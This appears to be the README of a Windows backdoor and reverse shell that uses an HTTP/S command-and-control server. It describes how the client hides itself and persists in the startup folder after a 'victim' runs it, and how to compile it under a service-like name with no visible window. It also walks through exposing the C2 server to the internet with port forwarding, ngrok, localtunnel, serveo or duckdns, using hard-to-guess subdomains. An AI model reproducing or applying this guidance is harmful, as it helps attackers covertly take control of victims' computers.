A simple, persisent windows toy backdoor/reverse-shell using HTTP/S to communicate with the C2 server.
Once the victim starts the executable it locates itself on default startup programs directory, then it tries to establish a connection.
Edit the line 6 with your own reachable domain or public IP address.
gcc barbie.c -o startupsrvc -w -mwindows
Start your server with python3 server.py, this will run your server locally on the port 5001, feel free to change that.
For using a self-signed TLS certificate add ssl_context="adhoc" in the last line of the code, this may cause problems if you use the below mentioned tunneling services.
To avoid different code pages i used utf-8 to decode the raw data sent by the client.
See this link to see the right encoding format for your country.
Now you have to expose your localhost on the internet, there are various methods to do this:
- Setting up port forwarding by opening the choosen port for your pc on your modem router (unless you're under a Carrier-grade NAT)
- Using a reverse proxy to start an HTTPS tunnel:
- Ngrok:
ngrok http 5001 - Localtunnel:
lt --port 5001 --subdomain <choose a name> - Serveo through SSH:
ssh -R <choose a name>.serveo.net:80:localhost:5001 serveo.net
- Ngrok:
These services will automatically generate TLS certificates.
Obviously you want your subdomain to last longer.
- For ngrok see this guide
- For serveo and localtunnel, just choose a name that anyone wouldn't guess
if you're not using a tunneling service you could try duckdns